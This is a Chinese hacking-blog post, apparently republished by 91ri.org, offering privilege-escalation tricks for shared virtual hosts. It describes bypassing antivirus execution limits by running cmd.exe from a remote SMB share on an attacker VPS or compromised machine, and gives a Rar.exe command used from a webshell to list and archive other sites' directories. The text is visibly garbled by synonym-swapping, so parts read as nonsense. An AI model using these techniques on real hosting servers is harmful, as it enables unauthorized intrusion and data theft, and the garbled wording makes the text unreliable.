|
|
|
联系客服020-83701501

调用远程路径去执行CMD

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
调用远程路径去实行CMD

能否大家遇到虚构主机提权的时候,有这种情况,无论你写哪都提示的 “回绝接见”?

原因大多数是麦咖啡的一个听从,只让特定的目次梗概实行步伐,比喻(c:\progra~1和c:\windows\system32\)这些目次区实行步伐,固然这些目次不或许让你写,此外的任何可写的目次都不会让你实行,屯子是回绝接见。

上面是团体的小才力:

1.1: 能否大家会想到调用远程路径去实行CMD,比喻(\\x.x.x.x\test\cmd.exe),经过我的测试是梗概告捷的,而且就算你EXP不免杀, 杀软也不会提示!起初记得我有个T00LS的朋侪找提权,也是这种情况,起初帮他计划了。调用远程路径的时候要把稳一下几点:

1.2:找一台本人的VPS梗概或许打下来的肉鸡,本人的机械必要封闭445端口,激活GUEST用户,在组策略中将 网络接见: 外埠帐户的同享和安全模型 改为范例,所在同享目次步伐给Everyone权限,如图:

虚拟主机提权,调用远程路径去执行CMD

1.3:还要把稳一点即是你要提权的机械能去接见你本人VPS的445端口,想知道能不能接见梗概在SHELL上扫一下(如果不能,他必定能去接见C段中机械的同享,相熟理睬啥意思了?)

2:这里提到的第二个小才力即是垄断WINRAR,理当有些人已经会用他去列目次了,(这个办法即是你其实提不了,补丁很全,要么即是杀软很牛,而免杀不是你的刚烈,如果你想跨目次弄到指标站),起首在指标站找个图片地点,

日后shell皮相C:\progra~1\WinRAR\Rar.exe a -k -r -s -m1 c:\windows\temp\xx.rar E:\freehost\xxxasdfdsafsaf.jpg,何等shell中会回显你打包告捷,指标站点根路径会浮现出来,日后你打包站点根路径, 会将站点扫数量次列出来,你们或许会问,但凡虚构权限你怎样从前,可是我测试了星外,新网的虚构主机,都告捷列出目次并打包。。

即是提权的一点小才力,大牛勿喷。转头一看,文笔真烂,算了,不改了,内人催睡觉了,列位黑阔们,晚安。

91ri.org:文中所说的远程调用是梗概告捷,然则第2点的垄断WINRAR来跨目次却是没有见过,手中也没有符合的SHELL梗概测试。团体猜想从文中意思相熟:E:\freehost\xxxasdfdsafsaf.jpg 的xxxasdfdsafsaf.jpg 理当是一个不存在的文件,由于不或许某个虚构目次下会有JPG文件(黑阔们的文笔都欠好,文章写的让人很隐晦 -.-),列位如果手中有符合的SHELL梗概亲测一下,如果有告捷的,麻烦你们在文章末尾留个言复杂引见下办法。如果有人留言引见办法咱们会及时更新文章的,就权当为先人铺垫铺垫了 :)

参考文章:

http://lcx.cc/?i=3221

https://www.t00ls.net/viewthread.php?tid=21282

本文由网络安全攻防研究室(www.91ri.org)新闻安全小组收集整理,转载请说明因由。

数安新闻+更多

证书相关+更多